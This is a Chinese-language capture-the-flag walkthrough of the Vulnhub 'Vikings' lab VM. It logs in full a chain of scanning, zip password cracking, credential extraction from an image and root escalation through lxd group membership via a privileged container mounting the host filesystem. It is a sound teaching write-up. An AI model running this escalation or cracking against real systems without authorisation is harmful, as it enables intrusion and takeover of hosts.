Vulnhub之Vikings靶机超级详细测试过程
Vikings
作者: jason_huawen
靶机基本信息
名称:Vikings: 1
地址:
https://www.vulnhub.com/entry/vikings-1,741/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.137.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:89:29:07 2 120 PCS Systemtechnik GmbH
192.168.56.126 08:00:27:09:9a:d1 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.126
NMAP扫描
首先利用NMAP工具对目标主机进行全端口的扫描:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.126 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-09 00:23 EST
Nmap scan report for bogon (192.168.56.126)
Host is up (0.00036s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA)
| 256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA)
|_ 256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519)
80/tcp open http Apache httpd 2.4.29
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2020-10-29 21:07 site/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:09:9A:D1 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.67 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
由于目标主机SSH服务没有可利用的漏洞,因此接下来主要对HTTP服务进行信息的收集:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="site/">site/</a></td><td align="right">2020-10-29 21:07 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.126/site/">here</a>.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.126 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/
<!DOCTYPE html>
<!-- This site was created in Webflow. http://www.webflow.com -->
<!-- Last Published: Fri May 01 2020 14:48:48 GMT+0000 (Coordinated Universal Time) -->
<html data-wf-page="5ea837e8c81001b668dffd4a" data-wf-site="5ea837e8c8100167b2dffd49">
<head>
<meta charset="utf-8">
<title>Split</title>
<meta content="width=device-width, initial-scale=1" name="viewport">
<meta content="Webflow" name="generator">
<link href="css/normalize.css" rel="stylesheet" type="text/css">
<link href="css/webflow.css" rel="stylesheet" type="text/css">
<link href="css/split-opl.webflow.css" rel="stylesheet" type="text/css">
<script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
<script type="text/javascript">WebFont.load({ google: { families: ["Inter:regular,600","Lora:regular"] }});</script>
<!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] -->
<script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
<link href="images/favicon.png" rel="shortcut icon" type="image/x-icon">
<link href="images/webclip.jpg" rel="apple-touch-icon">
<style type="text/css">
body {
-webkit-font-smoothing: antialiased;
}
</style>
</head>
<body class="body">
<div class="columns w-row">
<div class="leftcontent w-col w-col-6 w-col-stack">
<div data-w-id="b84f5156-c6e2-fb1d-6606-98a08030a472" style="opacity:0" class="image"></div>
</div>
<div class="rightcontent w-col w-col-6 w-col-stack">
<div data-w-id="3fd5aeb3-22da-ed60-7286-0d11f16597d3" style="opacity:0" class="content">
<div class="name">Ivar The Boneless</div>
<h1 class="tagline"><strong class="bold-text">Mad King</strong></h1>
<p class="bio">865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)</p>
<div class="links w-row">
<div class="column w-col w-col-4">
<div class="text-block-2">Connect</div>
<ul class="list w-list-unstyled">
<li><a href="#">Blog</a></li>
<li><a href="#">Email</a></li>
<li><a href="#">Newsletter</a></li>
</ul>
</div>
<div class="column-2 w-col w-col-4">
<div class="text-block-2">social</div>
<ul class="list w-list-unstyled">
<li><a href="#">Twitter</a></li>
<li><a href="#">Instagram</a></li>
<li><a href="#">Dribbble</a></li>
</ul>
</div>
<div class="w-col w-col-4">
<div class="text-block-2">network</div>
<ul class="list w-list-unstyled">
<li><a href="#">Link One</a></li>
<li><a href="#">Link Two</a></li>
<li><a href="#">Link Three</a></li>
</ul>
</div>
</div>
<div class="credit">©2020 Ivar The Boneless</div>
</div>
</div>
</div>
<script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.4.1.min.220afd743d.js?site=5ea837e8c8100167b2dffd49" type="text/javascript" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
<script src="js/webflow.js" type="text/javascript"></script>
<!-- [if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif] -->
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ nikto -h http://192.168.56.126/site/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.126
+ Target Hostname: 192.168.56.126
+ Target Port: 80
+ Start Time: 2022-12-09 02:56:40 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Server may leak inodes via ETags, header found with file /site/, inode: 1143, size: 5b2d5ac892300, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3268: /site/css/: Directory indexing found.
+ OSVDB-3092: /site/css/: This might be interesting...
+ OSVDB-3268: /site/images/: Directory indexing found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-12-09 02:56:54 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
访问/site/images目录,内有3张图片,将其下载到本地:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf split.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek split.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.22% (132.4 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf webclip.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek webclip.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.44% (132.7 MB)
[!] error: Could not find a valid passphrase.
看来这些图片没有什么用处,接下来扫描一下目标主机有哪些目录和文件:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ gobuster dir -u http://192.168.56.126/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.126/site/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/09 03:00:04 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 322] [--> http://192.168.56.126/site/images/]
/css (Status: 301) [Size: 319] [--> http://192.168.56.126/site/css/]
/js (Status: 301) [Size: 318] [--> http://192.168.56.126/site/js/]
Progress: 218385 / 220561 (99.01%)===============================================================
2022/12/09 03:00:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ gobuster dir -u http://192.168.56.126/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.126/site/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/12/09 03:00:43 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/images (Status: 301) [Size: 322] [--> http://192.168.56.126/site/images/]
/index.html (Status: 200) [Size: 4419]
/css (Status: 301) [Size: 319] [--> http://192.168.56.126/site/css/]
/js (Status: 301) [Size: 318] [--> http://192.168.56.126/site/js/]
/war.txt (Status: 200) [Size: 13]
/.html (Status: 403) [Size: 279]
Progress: 1101000 / 1102805 (99.84%)===============================================================
2022/12/09 03:03:03 Finished
===============================================================
发现了/war.txt文件,访问该文件:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/war.txt
/war-is-over
war.txt文件中有个目录,访问该目录,返回内容是经过编码的,将其下载到本地:
很奇怪,从浏览器拷贝网页内容到vim过程中,似乎进入了死循环,拷贝粘贴无法停止的节奏。改变方法,不能直接从网页上拷贝,而应该是用curl命令,并重定向:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ curl http://192.168.56.126/site/war-is-over/ > bigtext
看起来是base64编码,然后解码:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ cat bigtext| bas64 -d > decoded
cat decoded文件发现是乱码,用file命令查看,发现该文件是zip文件:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext decoded nmap_full_scan split.jpg webclip.jpg
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ file decoded
decoded: Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ mv decoded decoded.zip
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ unzip decoded.zip
Archive: decoded.zip
skipping: king need PK compat. v5.1 (can do v4.6)
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext decoded.zip nmap_full_scan split.jpg webclip.jpg
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ zip2john decoded.zip > zip_hash
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext decoded.zip nmap_full_scan split.jpg webclip.jpg zip_hash
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123 (decoded.zip/king)
1g 0:00:00:09 DONE (2022-12-09 03:19) 0.1107g/s 33112p/s 33112c/s 33112C/s redsox#1..money66
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到了zip文件的密码,解压缩decode.zip文件:(用终端命令解压缩有些问题,直接用图形化界面中的extract,然后输入密码)
得到文件: king, 是一副图片。
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ file king
king: JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=14, height=4000, bps=0, PhotometricIntepretation=RGB, description=Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 100901071, orientation=upper-left, width=6000], baseline, precision 8, 1600x1067, components 3
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ steghide extract -sf king
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ stegseek king
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.62% (132.9 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ exiftool king
ExifTool Version Number : 12.44
File Name : king
Directory : .
File Size : 1430 kB
File Modification Date/Time : 2021:09:03 06:30:03-04:00
File Access Date/Time : 2022:12:09 03:27:07-05:00
File Inode Change Date/Time : 2022:12:09 03:26:48-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Big-endian (Motorola, MM)
Photometric Interpretation : RGB
Image Description : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
Orientation : Horizontal (normal)
Samples Per Pixel : 3
X Resolution : 300
Y Resolution : 300
Resolution Unit : inches
Software : Adobe Photoshop CC 2019 (Windows)
Modify Date : 2018:11:26 10:32:02
Artist : vlastas
Exif Version : 0221
Color Space : Uncalibrated
Exif Image Width : 1600
Exif Image Height : 1067
Compression : JPEG (old-style)
Thumbnail Offset : 558
Thumbnail Length : 5613
Current IPTC Digest : 73f42d7d127f00bdd0e556910f4a85a8
Coded Character Set : UTF8
Application Record Version : 4
Caption-Abstract : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
By-line : vlastas
Object Name : 1009010713
Original Transmission Reference : 53616c7465645f5f0f79ebad28071734
Keywords : 3d, ancient, attack, battle, boat, culture, dark, denmark, drakkar, dramatic, dusk, engraved, evening, history, illustration, invasion, leadership, longboat, men, nautical, nordic, norse, north, northern, norway, occupation, river, sail, sailboat, scandinavian, shield, ship, storm, stormy, sun, sunbeam, sunlight, sunrise, sunset, vandal, vessel, viking, viking ship, war, warrior, water, weather, wind, windstorm, wooden
IPTC Digest : 73f42d7d127f00bdd0e556910f4a85a8
Displayed Units X : inches
Displayed Units Y : inches
Print Style : Centered
Print Position : 0 0
Print Scale : 1
Global Angle : 30
Global Altitude : 30
URL List :
Slices Group Name : viking021
Num Slices : 1
Pixel Aspect Ratio : 1
Photoshop Thumbnail : (Binary data 5613 bytes, use -b option to extract)
Has Real Merged Data : Yes
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CC 2019
Photoshop Quality : 12
Photoshop Format : Standard
Progressive Scans : 3 Scans
XMP Toolkit : Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22
Format : image/jpeg
Legacy IPTC Digest : 250DA4DEC6F34E708125EF03F795F091
Transmission Reference : 53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50
Credit : Shutterstock / vlastas
Source : Shutterstock
Color Mode : RGB
ICC Profile Name :
Document ID : adobe:docid:photoshop:2d821c53-a3ca-e346-80f6-118a95cc9817
Instance ID : xmp.iid:5bef0ca9-3ef9-e44f-865c-f39bdc472764
Original Document ID : A609744630A618A935A1D637005C673F
Create Date : 2018:11:26 10:28:18-06:00
Metadata Date : 2018:11:26 10:32:02-06:00
Creator Tool : Adobe Photoshop CC 2019 (Windows)
Description : Viking ships on the water under the sunlight and dark storm. Invasion in the storm. 3D illustration.; Shutterstock ID 1009010713
Title : 1009010713
Subject : 3d, ancient, attack, battle, boat, culture, dark, denmark, drakkar, dramatic, dusk, engraved, evening, history, illustration, invasion, leadership, longboat, men, nautical, nordic, norse, north, northern, norway, occupation, river, sail, sailboat, scandinavian, shield, ship, storm, stormy, sun, sunbeam, sunlight, sunrise, sunset, vandal, vessel, viking, viking ship, war, warrior, water, weather, wind, windstorm, wooden
Creator : vlastas
History Action : saved, converted, derived, saved, saved, converted, derived, saved
History Instance ID : xmp.iid:642d0712-667d-2d43-8e5e-dcde3e7be5bf, xmp.iid:f9584b87-136c-8c43-8d2b-121dfc42e1c3, xmp.iid:f312a9e4-c83e-5046-b32f-7d31285efcc6, xmp.iid:5bef0ca9-3ef9-e44f-865c-f39bdc472764
History When : 2018:11:26 10:31:55-06:00, 2018:11:26 10:31:55-06:00, 2018:11:26 10:32:02-06:00, 2018:11:26 10:32:02-06:00
History Software Agent : Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows), Adobe Photoshop CC 2019 (Windows)
History Changed : /, /, /, /
History Parameters : from image/jpeg to image/tiff, converted from image/jpeg to image/tiff, from image/tiff to image/jpeg, converted from image/tiff to image/jpeg
Derived From Instance ID : xmp.iid:f312a9e4-c83e-5046-b32f-7d31285efcc6
Derived From Document ID : adobe:docid:photoshop:a311ad0b-1bf9-f446-b96f-1960b71bb9bf
Derived From Original Document ID: A609744630A618A935A1D637005C673F
DCT Encode Version : 100
APP14 Flags 0 : [14]
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 1600
Image Height : 1067
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1600x1067
Megapixels : 1.7
Thumbnail Image : (Binary data 5613 bytes, use -b option to extract)
图片元数据中的transmission reference有点奇怪,
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 53616c7465645f5f0f79ebad2807173403390e2bb3edd8e2c4479d390bd71e50
Possible Hashs:
[+] SHA-256
[+] Haval-256
Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))
--------------------------------------------------
HASH: ^C
Bye!
用在线网站试图破解该SHA256都失败。这一段走了一些弯路,虽然总体方向没有错。
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ binwalk -e king
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, big-endian, offset of first image directory: 8
1429567 0x15D03F Zip archive data, at least v2.0 to extract, compressed size: 53, uncompressed size: 92, name: user
1429740 0x15D0EC End of Zip archive, footer length: 22
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ ls
bigtext decoded.zip image_hash king _king.extracted nmap_full_scan split.jpg webclip.jpg zip_hash
┌──(kali㉿kali)-[~/Vulnhub/Vikings]
└─$ cd _king.extracted
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ ls
15D03F.zip user
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ cat user
//FamousBoatbuilder_floki@vikings
//f@m0usboatbuilde7
用binwalk工具发现该图片中有个user文件,里面有用户名和密码
┌──(kali㉿kali)-[~/Vulnhub/Vikings/_king.extracted]
└─$ ssh floki@192.168.56.126
The authenticity of host '192.168.56.126 (192.168.56.126)' can't be established.
ED25519 key fingerprint is SHA256:volom5GRMcetvgfJsyVTXVnNY0FUA6W1k/5fsdHs9T4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.126' (ED25519) to the list of known hosts.
floki@192.168.56.126's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Dec 9 08:37:30 UTC 2022
System load: 0.0 Processes: 95
Usage of /: 53.5% of 8.79GB Users logged in: 0
Memory usage: 39% IP address for enp0s3: 192.168.56.126
Swap usage: 0%
0 updates can be applied immediately.
You have mail.
Last login: Sat Sep 4 04:38:04 2021 from 10.42.0.1
floki@vikings:~$ id
uid=1000(floki) gid=1000(floki) groups=1000(floki),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
floki@vikings:~$
提权
通过id命令我们知道floki是lxc组成员,接下来用lxc权限进行提权
将alpine-v3.13-x86_64-20210218_0139.tar.gz文件上传至靶机(该文件可以从网上下载):
┌──(kali㉿kali)-[~/Vulnhub/Vikings/lxd-alpine-builder]
└─$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz build-alpine LICENSE README.md
┌──(kali㉿kali)-[~/Vulnhub/Vikings/lxd-alpine-builder]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
但是在靶机上下载该文件时没有成功,估计是8000端口被靶机防火墙阻断掉了,需要将HTTP端口改为80:
floki@vikings:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:44:26-- http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... ^C
floki@vikings:/tmp$ ping 192.168.56.206
PING 192.168.56.206 (192.168.56.206) 56(84) bytes of data.
64 bytes from 192.168.56.206: icmp_seq=1 ttl=64 time=0.324 ms
^C
--- 192.168.56.206 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.324/0.324/0.324/0.000 ms
floki@vikings:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:45:25-- http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... ^C
floki@vikings:/tmp$ wget http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-12-09 08:45:41-- http://192.168.56.206/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64-20210218_01 100%[=====================================================>] 3.11M --.-KB/s in 0.01s
2022-12-09 08:45:41 (209 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
floki@vikings:/tmp$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-apache2.service-SaueZS
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-systemd-resolved.service-hZO7PK
systemd-private-58a0aa6af9df46eb8b3bac8bb71990cc-systemd-timesyncd.service-SI92UJ
floki@vikings:/tmp$
floki@vikings:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
报错,说没有storage pool,那就用lxd命令初始化一下,创建storage pool,
floki@vikings:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
Error: Failed to create network 'lxdbr0': open /proc/sys/net/ipv6/conf/lxdbr0/autoconf: no such file or directory
一路回车,结果报错,说无法创建网络,网上找解决方法,并没有找到合适的方法,我就简单粗暴的方法来处理,咱们就不用网络了呗,即: 重新初始化,在要创建网络的地方,回答no
floki@vikings:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]: no
Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
此次运行lxd init,没有报错,说明storage pool已经创建成功,那重新运行lxc
floki@vikings:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
The container you are starting doesn't have any network attached to it.
To create a new network, use: lxc network create
To attach a network to a container, use: lxc network attach
floki@vikings:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
floki@vikings:/tmp$ lxc start ignite
floki@vikings:/tmp$ lxc exec ignite /bin/sh
虽然提示没有网络,但是整个过程已经可以顺利进行,从而拿到了root shell
/mnt # cd root
/mnt/root # ls -alh
total 2G
drwxr-xr-x 24 root root 4.0K Sep 3 2021 .
drwxr-xr-x 1 root root 8 Dec 9 08:56 ..
drwxr-xr-x 2 root root 4.0K Sep 4 2021 bin
drwxr-xr-x 4 root root 4.0K Sep 4 2021 boot
drwxr-xr-x 2 root root 4.0K Sep 3 2021 cdrom
drwxr-xr-x 19 root root 3.8K Dec 9 04:47 dev
drwxr-xr-x 105 root root 4.0K Sep 4 2021 etc
drwxr-xr-x 4 root root 4.0K Sep 3 2021 home
lrwxrwxrwx 1 root root 34 Sep 3 2021 initrd.img -> boot/initrd.img-4.15.0-154-generic
lrwxrwxrwx 1 root root 34 Sep 3 2021 initrd.img.old -> boot/initrd.img-4.15.0-154-generic
drwxr-xr-x 23 root root 4.0K Sep 3 2021 lib
drwxr-xr-x 2 root root 4.0K Sep 3 2021 lib64
drwx------ 2 root root 16.0K Sep 3 2021 lost+found
drwxr-xr-x 2 root root 4.0K Aug 6 2020 media
drwxr-xr-x 2 root root 4.0K Aug 6 2020 mnt
